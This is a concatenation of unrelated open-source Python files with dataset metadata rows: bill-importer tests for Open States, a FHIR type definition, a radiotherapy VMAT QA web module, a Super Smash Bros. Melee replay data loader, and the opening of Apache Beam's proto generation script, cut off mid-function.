b2 = ScrapeBill("HB 1", "1900", "Axe & Tack Tax Act", chamber="upper")
with pytest.raises(DuplicateItemError):
BillImporter("jid").import_data([b1.as_dict(), b2.as_dict()])
@pytest.mark.django_db
def test_bill_update():
create_jurisdiction()
create_org()
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
_, what = BillImporter("jid").import_item(bill.as_dict())
assert what == "insert"
_, what = BillImporter("jid").import_item(bill.as_dict())
assert what == "noop"
# ensure no new object was created
assert Bill.objects.count() == 1
# test basic update
bill = ScrapeBill("HB 1", "1900", "1st Bill", chamber="lower")
_, what = BillImporter("jid").import_item(bill.as_dict())
assert what == "update"
assert Bill.objects.get().title == "1st Bill"
@pytest.mark.django_db
def test_bill_update_because_of_subitem():
create_jurisdiction()
create_org()
# initial bill
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["insert"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 1
last_updated = obj.updated_at
# now let's make sure we get updated when there are second actions
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
bill.add_action("this is a second action", chamber="lower", date="1900-01-02")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 2
assert obj.updated_at > last_updated
# same 2 actions, noop
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
bill.add_action("this is a second action", chamber="lower", date="1900-01-02")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["noop"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 2
# same 2 actions, different order, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is a second action", chamber="lower", date="1900-01-02")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 2
# different 2 actions, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
bill.add_action(
"this is a different second action", chamber="lower", date="1900-01-02"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 2
# delete an action, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is a second action", chamber="lower", date="1900-01-02")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 1
# delete all actions, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 0
# and back to initial status, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_action("this is an action", chamber="lower", date="1900-01-01")
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.actions.count() == 1
@pytest.mark.django_db
def test_bill_update_subsubitem():
create_jurisdiction()
create_org()
# initial sub-subitem
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["insert"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 1
# a second subsubitem, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
bill.add_version_link(
"printing", "http://example.com/test.text", media_type="text/plain"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 2
# same thing, noop
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
bill.add_version_link(
"printing", "http://example.com/test.text", media_type="text/plain"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["noop"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 2
# different link for second one, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
bill.add_version_link(
"printing", "http://example.com/diff-link.txt", media_type="text/plain"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 2
# delete one, update
bill = ScrapeBill("HB 1", "1900", "First Bill", chamber="lower")
bill.add_version_link(
"printing", "http://example.com/test.pdf", media_type="application/pdf"
)
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["update"] == 1
obj = Bill.objects.get()
assert obj.versions.count() == 1
assert obj.versions.get().links.count() == 1
@pytest.mark.django_db
def test_bill_sponsor_by_identifier():
create_jurisdiction()
org = create_org()
bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
bill.add_sponsorship_by_identifier(
name="SNODGRASS",
classification="sponsor",
entity_type="person",
primary=True,
identifier="TOTALLY_REAL_ID",
scheme="TOTALLY_REAL_SCHEME",
)
za_db = Person.objects.create(name="Zadock Snodgrass")
za_db.identifiers.create(identifier="TOTALLY_REAL_ID", scheme="TOTALLY_REAL_SCHEME")
Membership.objects.create(person_id=za_db.id, organization_id=org.id)
BillImporter("jid").import_data([bill.as_dict()])
obj = Bill.objects.get()
(entry,) = obj.sponsorships.all()
assert entry.person.name == "Zadock Snodgrass"
@pytest.mark.django_db
def test_bill_sponsor_limit_lookup_by_jurisdiction():
create_jurisdiction()
org = create_org()
bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
bill.add_sponsorship_by_identifier(
name="SNODGRASS",
classification="sponsor",
entity_type="person",
primary=True,
identifier="TOTALLY_REAL_ID",
scheme="TOTALLY_REAL_SCHEME",
)
za_db = Person.objects.create(name="Zadock Snodgrass", birth_date="1800-01-01")
za_db.identifiers.create(identifier="TOTALLY_REAL_ID", scheme="TOTALLY_REAL_SCHEME")
Membership.objects.create(person_id=za_db.id, organization_id=org.id)
# This is contrived and perhaps broken, but we're going to check this.
# We *really* don't want to *ever* cross jurisdiction bounds.
za2 = Person.objects.create(name="Zadock Snodgrass")
za2.identifiers.create(identifier="TOTALLY_REAL_ID", scheme="TOTALLY_REAL_SCHEME")
assert Person.objects.count() == 2
BillImporter("jid").import_data([bill.as_dict()])
obj = Bill.objects.get()
(entry,) = obj.sponsorships.all()
assert entry.person.name == "Zadock Snodgrass"
assert entry.person.birth_date == "1800-01-01"
@pytest.mark.django_db
def test_bill_sponsor_limit_lookup_within_session():
j = create_jurisdiction()
org = create_org()
j.legislative_sessions.create(
identifier="2021", name="2021", start_date="2021", end_date="2022"
)
old_bill = ScrapeBill(
"HB 1", "1900", "Axe & Tack Tax Act", classification="tax bill", chamber="lower"
)
old_bill.add_sponsorship(
name="Springfield",
classification="sponsor",
entity_type="person",
primary=True,
)
new_bill = ScrapeBill(
"HB 9000",
"2021",
"Laser Regulations",
classification="tax bill",
chamber="lower",
)
new_bill.add_sponsorship(
name="Springfield",
classification="sponsor",
entity_type="person",
primary=True,
)
jeb = Person.objects.create(
name="Jebediah Springfield", birth_date="1850-01-01", family_name="Springfield"
)
Membership.objects.create(
person_id=jeb.id, organization_id=org.id, end_date="1910-01-01"
)
futuro = Person.objects.create(
name="Futuro Springfield", birth_date="2000-01-01", family_name="Springfield"
)
Membership.objects.create(
person_id=futuro.id, organization_id=org.id, start_date="2020-04-01"
)
BillImporter("jid").import_data([old_bill.as_dict(), new_bill.as_dict()])
# get old bill and ensure Jeb is sponsor
old_bill_obj = Bill.objects.get(identifier="HB 1")
(entry,) = old_bill_obj.sponsorships.all()
assert entry.person.name == jeb.name
# get new bill and ensure Futuro is sponsor
new_bill_obj = Bill.objects.get(identifier="HB 9000")
(entry,) = new_bill_obj.sponsorships.all()
assert entry.person.name == futuro.name
@pytest.mark.django_db
def test_fix_bill_id():
create_jurisdiction()
create_org()
bill = ScrapeBill(
"hb1", "1900", "Test Bill ID", classification="bill", chamber="lower"
)
from openstates.settings import IMPORT_TRANSFORMERS
IMPORT_TRANSFORMERS["bill"] = {
"identifier": fix_bill_id,
}
bi = BillImporter("jid")
bi.import_data([bill.as_dict()])
IMPORT_TRANSFORMERS["bill"] = {}
b = Bill.objects.get()
assert b.identifier == "HB 1"
@pytest.mark.django_db
def test_bill_duplicate_actions_ordering():
create_jurisdiction()
create_org()
def _problem_bill():
bill = ScrapeBill(
"HB 1",
"1900",
"Axe & Tack Tax Act",
classification="tax bill",
chamber="lower",
)
# two identical actions, and one differs
bill.add_action("identical action", "1900-04-01", chamber="lower")
bill.add_action("different action", "1900-04-01", chamber="lower")
bill.add_action("identical action", "1900-04-01", chamber="lower")
return bill
# import bill
bill = _problem_bill()
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["insert"] == 1
assert result["bill"]["update"] == 0
assert result["bill"]["noop"] == 0
bill = _problem_bill()
result = BillImporter("jid").import_data([bill.as_dict()])
assert result["bill"]["insert"] == 0
assert result["bill"]["update"] == 0
assert result["bill"]["noop"] == 1
| 33.934334 | 88 | 0.650965 |
6359c038d599fb2cc221c2649199aa5f53947c9f
| 3,970 |
py
|
Python
|
src/fhir_types/FHIR_SubstanceSpecification_Relationship.py
|
anthem-ai/fhir-types
|
42348655fb3a9b3f131b911d6bc0782da8c14ce4
|
[
"Apache-2.0"
] | 2 |
2022-02-03T00:51:30.000Z
|
2022-02-03T18:42:43.000Z
|
src/fhir_types/FHIR_SubstanceSpecification_Relationship.py
|
anthem-ai/fhir-types
|
42348655fb3a9b3f131b911d6bc0782da8c14ce4
|
[
"Apache-2.0"
] | null | null | null |
src/fhir_types/FHIR_SubstanceSpecification_Relationship.py
|
anthem-ai/fhir-types
|
42348655fb3a9b3f131b911d6bc0782da8c14ce4
|
[
"Apache-2.0"
] | null | null | null |
from typing import Any, List, Literal, TypedDict
from .FHIR_boolean import FHIR_boolean
from .FHIR_CodeableConcept import FHIR_CodeableConcept
from .FHIR_Element import FHIR_Element
from .FHIR_Quantity import FHIR_Quantity
from .FHIR_Range import FHIR_Range
from .FHIR_Ratio import FHIR_Ratio
from .FHIR_Reference import FHIR_Reference
from .FHIR_string import FHIR_string
# The detailed description of a substance, typically at a level beyond what is used for prescribing.
FHIR_SubstanceSpecification_Relationship = TypedDict(
"FHIR_SubstanceSpecification_Relationship",
{
# Unique id for the element within a resource (for internal references). This may be any string value that does not contain spaces.
"id": FHIR_string,
# May be used to represent additional information that is not part of the basic definition of the element. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension.
"extension": List[Any],
# May be used to represent additional information that is not part of the basic definition of the element and that modifies the understanding of the element in which it is contained and/or the understanding of the containing element's descendants. Usually modifier elements provide negation or qualification. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. Applications processing a resource are required to check for modifier extensions.Modifier extensions SHALL NOT change the meaning of any elements on Resource or DomainResource (including cannot change the meaning of modifierExtension itself).
"modifierExtension": List[Any],
# A pointer to another substance, as a resource or just a representational code.
"substanceReference": FHIR_Reference,
# A pointer to another substance, as a resource or just a representational code.
"substanceCodeableConcept": FHIR_CodeableConcept,
# For example "salt to parent", "active moiety", "starting material".
"relationship": FHIR_CodeableConcept,
# For example where an enzyme strongly bonds with a particular substance, this is a defining relationship for that enzyme, out of several possible substance relationships.
"isDefining": FHIR_boolean,
# Extensions for isDefining
"_isDefining": FHIR_Element,
# A numeric factor for the relationship, for instance to express that the salt of a substance has some percentage of the active substance in relation to some other.
"amountQuantity": FHIR_Quantity,
# A numeric factor for the relationship, for instance to express that the salt of a substance has some percentage of the active substance in relation to some other.
"amountRange": FHIR_Range,
# A numeric factor for the relationship, for instance to express that the salt of a substance has some percentage of the active substance in relation to some other.
"amountRatio": FHIR_Ratio,
# A numeric factor for the relationship, for instance to express that the salt of a substance has some percentage of the active substance in relation to some other.
"amountString": str,
# Extensions for amountString
"_amountString": FHIR_Element,
# For use when the numeric.
"amountRatioLowLimit": FHIR_Ratio,
# An operator for the amount, for example "average", "approximately", "less than".
"amountType": FHIR_CodeableConcept,
# Supporting literature.
"source": List[FHIR_Reference],
},
total=False,
)
| 77.843137 | 836 | 0.756423 |
8f4b210dbe60358a33aeab0b4611f3235d4c7c37
| 7,644 |
py
|
Python
|
pyqaserver/vmat_module.py
|
brjdenis/qaserver
|
93a4c3272cf38199e7ef67d1285a9ffacef46883
|
[
"MIT"
] | 11 |
2019-12-02T04:27:48.000Z
|
2020-06-10T09:18:11.000Z
|
pyqaserver/vmat_module.py
|
brjdenis/pyqaserver
|
93a4c3272cf38199e7ef67d1285a9ffacef46883
|
[
"MIT"
] | 13 |
2020-10-19T16:38:56.000Z
|
2021-05-04T19:44:01.000Z
|
pyqaserver/vmat_module.py
|
brjdenis/qaserver
|
93a4c3272cf38199e7ef67d1285a9ffacef46883
|
[
"MIT"
] | 2 |
2020-01-13T17:00:41.000Z
|
2020-01-28T21:32:58.000Z
|
import sys
import os
import numpy as np
from multiprocessing import Pool
import tempfile
import matplotlib.style
import matplotlib
matplotlib.use('Agg')
from matplotlib.figure import Figure
# To revert back to matplotlib 1.0 style
matplotlib.style.use('classic')
from pylinac import DRGS, DRMLC
parent_module = sys.modules['.'.join(__name__.split('.')[:-1]) or '__main__']
if __name__ == '__main__' or parent_module.__name__ == '__main__':
#sys.path.append(os.path.abspath(os.path.realpath("python_packages")))
import config
from python_packages.bottlepy.bottle import Bottle, request, TEMPLATE_PATH, template, redirect, response
import general_functions
import RestToolbox_modified as RestToolbox
from python_packages import mpld3
else:
from . import config
from .python_packages.bottlepy.bottle import Bottle, request, TEMPLATE_PATH, template, redirect, response
from . import general_functions
from . import RestToolbox_modified as RestToolbox
from .python_packages import mpld3
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
# Path to Bottle templates
TEMPLATE_PATH.insert(0, os.path.join(CUR_DIR, 'views'))
# Url to some mpld3 library
D3_URL = config.D3_URL
MPLD3_URL = config.MPLD3_URL
PI = np.pi
# MLC type for PicketFence analysis:
LEAF_TYPE = ["Varian_120", "Varian_120HD", "Varian_80", "Elekta_80", "Elekta_160"]
# Here starts the bottle server
vmat_app = Bottle()
@vmat_app.route('/vvmat', method="POST")
def vvmat():
displayname = request.forms.hidden_displayname
username = request.get_cookie("account", secret=config.SECRET_KEY)
if not username:
redirect("/login")
try:
variables = general_functions.Read_from_dcm_database()
variables["displayname"] = displayname
response.set_cookie("account", username, secret=config.SECRET_KEY, samesite="lax")
except ConnectionError:
return template("error_template", {"error_message": "Orthanc is refusing connection."})
return template("vvmat", variables)
def vmat_helperf_catch_error(args):
try:
return vmat_helperf(args)
except Exception as e:
return template("error_template", {"error_message": str(e)})
def vmat_helperf(args):
testtype = args["testtype"]
w1 = args["w1"]
w2 = args["w2"]
imgdescription = args["imgdescription"]
station = args["station"]
displayname = args["displayname"]
acquisition_datetime = args["acquisition_datetime"]
general_functions.set_configuration(args["config"])
# Collect data for "save results"
dicomenergy = general_functions.get_energy_from_imgdescription(imgdescription)
user_machine, user_energy = general_functions.get_user_machine_and_energy(station, dicomenergy)
machines_and_energies = general_functions.get_machines_and_energies(general_functions.get_treatmentunits_vmat())
tolerances = general_functions.get_tolerance_user_machine_vmat(user_machine) # If user_machne has specific tolerance
if not tolerances:
tolerance, pdf_report_enable = general_functions.get_settings_vmat()
else:
tolerance, pdf_report_enable = tolerances[0]
tolerance = float(tolerance)
save_results = {
"user_machine": user_machine,
"user_energy": user_energy,
"machines_and_energies": machines_and_energies,
"testtype": [testtype],
"displayname": displayname
}
if w1==w2:
return template("error_template", {"error_message": "Selected images must not be equal. One image should be an open field,"\
" the other DRGS or DRMLC."})
try:
temp_folder1, file_path1 = RestToolbox.GetSingleDcm(config.ORTHANC_URL, w1)
temp_folder2, file_path2 = RestToolbox.GetSingleDcm(config.ORTHANC_URL, w2)
except:
return template("error_template", {"error_message": "Cannot read images."})
try:
if testtype == "DRGS":
myvmat = DRGS(image_paths=(file_path1, file_path2))
else:
myvmat = DRMLC(image_paths=(file_path1, file_path2))
myvmat.analyze(tolerance=tolerance)
except Exception as e:
return template("error_template", {"error_message": "Cannot analyze images. "+str(e)})
fig1 = Figure(figsize=(10.5, 5), tight_layout={"w_pad":3, "pad": 3})
ax1 = fig1.add_subplot(1,2,1)
ax2 = fig1.add_subplot(1,2,2)
ax1.imshow(myvmat.open_image.array, cmap=matplotlib.cm.gray, interpolation="none", aspect="equal", origin='upper')
ax1.set_title('Open')
ax1.axis('off')
myvmat._draw_segments(ax1)
ax2.imshow(myvmat.dmlc_image, cmap=matplotlib.cm.gray, interpolation="none", aspect="equal", origin='upper')
ax2.set_title('DMLC')
ax2.axis('off')
myvmat._draw_segments(ax2)
mpld3.plugins.connect(fig1, mpld3.plugins.MousePosition(fontsize=14, fmt=".2f"))
script1 = mpld3.fig_to_html(fig1, d3_url=D3_URL, mpld3_url=MPLD3_URL)
fig2 = Figure(figsize=(10.5, 5), tight_layout={"w_pad":1, "pad": 1})
ax3 = fig2.add_subplot(1,1,1)
dmlc_prof, open_prof = myvmat._median_profiles((myvmat.dmlc_image, myvmat.open_image))
# Taken from pylinac:
ax3.plot(dmlc_prof.values, label='DMLC')
ax3.plot(open_prof.values, label='Open')
ax3.autoscale(axis='x', tight=True)
ax3.legend(loc=8, fontsize='large')
ax3.grid()
ax3.set_title("Median profiles")
ax3.margins(0.05)
mpld3.plugins.connect(fig2, mpld3.plugins.MousePosition(fontsize=14, fmt=".2f"))
script2 = mpld3.fig_to_html(fig2, d3_url=D3_URL, mpld3_url=MPLD3_URL)
# Collect data
Rcorr = [roi.r_corr for roi in myvmat.segments]
diff_corr = myvmat.r_devs
diff_avg_abs = round(myvmat.avg_abs_r_deviation, 2)
max_diff_abs = round(myvmat.max_r_deviation, 2)
segment_passed = [roi.passed for roi in myvmat.segments]
test_passed = myvmat.passed
variables = {
"script1": script1,
"script2": script2,
"Rcorr": Rcorr,
"diff_corr": diff_corr,
"diff_avg_abs": diff_avg_abs,
"max_diff_abs": max_diff_abs,
"segment_passed": segment_passed,
"test_passed": test_passed,
"save_results": save_results,
"pdf_report_enable": pdf_report_enable,
"acquisition_datetime": acquisition_datetime
}
# Generate pylinac report:
if pdf_report_enable == "True":
pdf_file = tempfile.NamedTemporaryFile(delete=False, prefix="VMAT", suffix=".pdf", dir=config.PDF_REPORT_FOLDER)
myvmat.publish_pdf(pdf_file)
variables["pdf_report_filename"] = os.path.basename(pdf_file.name)
general_functions.delete_files_in_subfolders([temp_folder1, temp_folder2]) # Delete image
return template("vmat_results", variables)
@vmat_app.route('/vvmat/<w1>/<w2>/<testtype>', method="POST")
def vvmat_calculate(w1, w2, testtype):
imgdescription = request.forms.hidden_imgdescription
station = request.forms.hidden_station
displayname = request.forms.hidden_displayname
acquisition_datetime = request.forms.hidden_datetime
args = {"w1": w1, "w2": w2, "testtype": testtype, "imgdescription": imgdescription,
"station": station, "displayname": displayname, "acquisition_datetime": acquisition_datetime,
"config": general_functions.get_configuration()}
p = Pool(1)
data = p.map(vmat_helperf_catch_error, [args])
p.close()
p.join()
return data
| 39.2 | 132 | 0.685897 |
93ad718a419912709307979bcc1d7642105608e5
| 8,377 |
py
|
Python
|
slippi_ai/data.py
|
supersteph/slippi-ai
|
97e0845789e95c1511295bad626a514fff46ce74
|
[
"MIT"
] | 12 |
2020-11-11T06:39:23.000Z
|
2022-02-26T04:55:31.000Z
|
slippi_ai/data.py
|
supersteph/slippi-ai
|
97e0845789e95c1511295bad626a514fff46ce74
|
[
"MIT"
] | 5 |
2020-11-26T18:17:17.000Z
|
2022-02-07T16:48:34.000Z
|
slippi_ai/data.py
|
supersteph/slippi-ai
|
97e0845789e95c1511295bad626a514fff46ce74
|
[
"MIT"
] | 9 |
2020-11-15T18:24:47.000Z
|
2022-01-15T18:00:18.000Z
|
import atexit
import itertools
import multiprocessing as mp
import os
import pickle
import random
from typing import Any, Iterable, List, Optional, Sequence, Set, Tuple, Iterator, NamedTuple
import zlib
import numpy as np
import tree
import melee
from slippi_ai import embed, reward, stats, utils
Nest = Any
Controller = Nest
Game = Nest
class CompressedGame(NamedTuple):
states: Game
counts: Sequence[int]
rewards: Sequence[float]
class Batch(NamedTuple):
game: CompressedGame
needs_reset: bool
def train_test_split(data_dir, subset=None, test_ratio=.1):
if subset:
print("Using subset:", subset)
filenames = stats.get_subset(subset)
filenames = [name + '.pkl' for name in filenames]
else:
print("Using all replays in", data_dir)
filenames = sorted(os.listdir(data_dir))
print(f"Found {len(filenames)} replays.")
# reproducible train/test split
rng = random.Random()
rng.shuffle(filenames)
test_files = rng.sample(filenames, int(test_ratio * len(filenames)))
test_set = set(test_files)
train_files = [f for f in filenames if f not in test_set]
train_paths = [os.path.join(data_dir, f) for f in train_files]
test_paths = [os.path.join(data_dir, f) for f in test_files]
if not test_paths:
test_paths = train_paths
return train_paths, test_paths
def game_len(game: CompressedGame):
return len(game.counts)
class TrajectoryManager:
# TODO: manage recurrent state? can also do it in the learner
def __init__(self, source: Iterator[CompressedGame]):
self.source = source
self.game: CompressedGame = None
def find_game(self, n):
while True:
game = next(self.source)
if game_len(game) >= n: break
self.game = game
self.frame = 0
def grab_chunk(self, n) -> Tuple[CompressedGame, bool]:
# TODO: write a unit test for this
needs_reset = self.game is None or game_len(self.game) - self.frame < n
if needs_reset:
self.find_game(n)
new_frame = self.frame + n
slice = lambda a: a[self.frame:new_frame]
chunk = tree.map_structure(slice, self.game)
self.frame = new_frame
return Batch(chunk, needs_reset)
def swap_players(game: Game) -> Game:
old_players = game['player']
new_players = {1: old_players[2], 2: old_players[1]}
new_game = game.copy()
new_game['player'] = new_players
return new_game
def detect_repeated_actions(controllers: Nest) -> Sequence[bool]:
"""Labels actions as repeated or not.
Args:
controllers: A nest of numpy arrays with shape [T].
Returns:
A boolean numpy array `repeats` with shape [T-1].
repeats[i] is True iff controllers[i+1] equals controllers[i]
"""
is_same = lambda a: a[:-1] == a[1:]
repeats = tree.map_structure(is_same, controllers)
repeats = np.stack(tree.flatten(repeats), -1)
repeats = np.all(repeats, -1)
return repeats
def indices_and_counts(
repeats: Sequence[bool],
max_repeat=15,
) -> Tuple[Sequence[int], Sequence[int]]:
"""Finds the indices and counts of repeated actions.
`repeats` is meant to be produced by `detect_repeated_actions`
If `controllers` is [a, a, a, c, b, b], then
repeats = [T, T, F, F, T]
indices = [2, 3, 5]
counts = [2, 0, 1]
Args:
repeats: A boolean array with shape [T-1].
max_repeat: Maximum number of consecutive repeated actions before a repeat
is considered a non-repeat.
Returns:
A tuple (indices, counts).
"""
indices = []
counts = []
count = 0
for i, is_repeat in enumerate(repeats):
if not is_repeat or count == max_repeat:
indices.append(i) # index of the last repeated action
counts.append(count)
count = 0
else:
count += 1
indices.append(len(repeats))
counts.append(count)
return np.array(indices), np.array(counts)
def compress_repeated_actions(
game: Game,
rewards: Sequence[float],
embed_controller: embed.Embedding,
max_repeat: int,
) -> CompressedGame:
controllers = game['player'][1]['controller_state']
controllers = embed_controller.map(lambda e, a: e.preprocess(a), controllers)
repeats = detect_repeated_actions(controllers)
indices, counts = indices_and_counts(repeats, max_repeat)
compressed_game = tree.map_structure(lambda a: a[indices], game)
reward_indices = np.concatenate([[0], indices[:-1]])
compressed_rewards = np.add.reduceat(rewards, reward_indices)
compressed_game = CompressedGame(compressed_game, counts, compressed_rewards)
shapes = [x.shape for x in tree.flatten(compressed_game)]
for s in shapes:
assert s == shapes[0]
return compressed_game
def _charset(chars: Optional[Iterable[melee.Character]]) -> Set[int]:
if chars is None:
chars = list(melee.Character)
return set(c.value for c in chars)
class DataSource:
def __init__(
self,
filenames,
compressed=True,
batch_size=64,
unroll_length=64,
max_action_repeat=15,
# preprocesses (discretizes) actions before repeat detection
embed_controller=None,
# Lists of melee.Character. None means all allowed.
allowed_characters=None,
allowed_opponents=None,
):
self.filenames = filenames
self.batch_size = batch_size
self.unroll_length = unroll_length
self.compressed = compressed
self.max_action_repeat = max_action_repeat
self.embed_controller = embed_controller
trajectories = self.produce_trajectories()
self.managers = [
TrajectoryManager(trajectories)
for _ in range(batch_size)]
self.allowed_characters = _charset(allowed_characters)
self.allowed_opponents = _charset(allowed_opponents)
def produce_trajectories(self) -> Iterator[CompressedGame]:
raw_games = self.produce_raw_games()
allowed_games = filter(self.is_allowed, raw_games)
processed_games = map(self.process_game, allowed_games)
return processed_games
def process_game(self, game: Game) -> CompressedGame:
rewards = reward.compute_rewards(game)
return compress_repeated_actions(
game, rewards, self.embed_controller, self.max_action_repeat)
def produce_raw_games(self) -> Iterator[Game]:
"""Raw games without post-processing."""
self.file_counter = 0
for path in itertools.cycle(self.filenames):
self.file_counter += 1
with open(path, 'rb') as f:
obj_bytes = f.read()
if self.compressed:
obj_bytes = zlib.decompress(obj_bytes)
game = pickle.loads(obj_bytes)
yield game
yield swap_players(game)
def is_allowed(self, game: Game) -> bool:
return (
game['player'][1]['character'][0] in self.allowed_characters
and
game['player'][2]['character'][0] in self.allowed_opponents)
def __next__(self) -> Tuple[Batch, float]:
next_batch = utils.batch_nest(
[m.grab_chunk(self.unroll_length) for m in self.managers])
epoch = self.file_counter / len(self.filenames)
return next_batch, epoch
def produce_batches(data_source_kwargs, batch_queue):
data_source = DataSource(**data_source_kwargs)
while True:
batch_queue.put(next(data_source))
class DataSourceMP:
def __init__(self, buffer=4, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
self.batch_queue = mp.Queue(buffer)
self.process = mp.Process(
target=produce_batches, args=(kwargs, self.batch_queue))
self.process.start()
atexit.register(self.batch_queue.close)
atexit.register(self.process.terminate)
def __next__(self) -> Tuple[Batch, float]:
return self.batch_queue.get()
_name_to_character = {c.name.lower(): c for c in melee.Character}
def _chars_from_string(chars: str) -> List[melee.Character]:
if chars == 'all':
return list(melee.Character)
chars = chars.split(',')
return [_name_to_character[c] for c in chars]
CONFIG = dict(
batch_size=32,
unroll_length=64,
compressed=True,
max_action_repeat=15,
in_parallel=True,
# comma-separated lists of characters, or "all"
allowed_characters='all',
allowed_opponents='all',
)
def make_source(
allowed_characters: str,
allowed_opponents: str,
in_parallel: bool,
**kwargs):
constructor = DataSourceMP if in_parallel else DataSource
return constructor(
allowed_characters=_chars_from_string(allowed_characters),
allowed_opponents=_chars_from_string(allowed_opponents),
**kwargs)
| 29.600707 | 92 | 0.701922 |
59d6cb7fe1c2e0697da77ed684195fa971ed4549
| 5,109 |
py
|
Python
|
sdks/python/gen_protos.py
|
Sil1991/gcpdf-demo
|
88ecd538a30f009b239a1b320ab6ad75f6901ae0
|
[
"Apache-2.0"
] | 1 |
2018-04-14T15:56:19.000Z
|
2018-04-14T15:56:19.000Z
|
sdks/python/gen_protos.py
|
Sil1991/gcpdf-demo
|
88ecd538a30f009b239a1b320ab6ad75f6901ae0
|
[
"Apache-2.0"
] | 13 |
2019-11-13T03:56:36.000Z
|
2021-12-14T21:12:07.000Z
|
sdks/python/gen_protos.py
|
Sil1991/gcpdf-demo
|
88ecd538a30f009b239a1b320ab6ad75f6901ae0
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Generates Python proto modules and grpc stubs for Beam protos."""
import glob
import logging
import multiprocessing
import os
import pkg_resources
import shutil
import subprocess
import sys
import time
import warnings
GRPC_TOOLS = 'grpcio-tools>=1.3.5'
BEAM_PROTO_PATHS = [
os.path.join('..', '..', 'model', 'pipeline', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'job-management', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'fn-execution', 'src', 'main', 'proto'),
]
PYTHON_OUTPUT_PATH = os.path.join('apache_beam', 'portability', 'api')
def generate_proto_files(force=False):
try:
import grpc_tools
except ImportError:
warnings.warn('Installing grpcio-tools is recommended for development.')
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
common = os.path.join(py_sdk_root, '..', 'common')
proto_dirs = [os.path.join(py_sdk_root, path) for path in BEAM_PROTO_PATHS]
proto_files = sum(
[glob.glob(os.path.join(d, '*.proto')) for d in proto_dirs], [])
out_dir = os.path.join(py_sdk_root, PYTHON_OUTPUT_PATH)
out_files = [path for path in glob.glob(os.path.join(out_dir, '*_pb2.py'))]
if out_files and not proto_files and not force:
# We have out_files but no protos; assume they're up to date.
# This is actually the common case (e.g. installation from an sdist).
logging.info('No proto files; using existing generated files.')
return
elif not out_files and not proto_files:
if not os.path.exists(common):
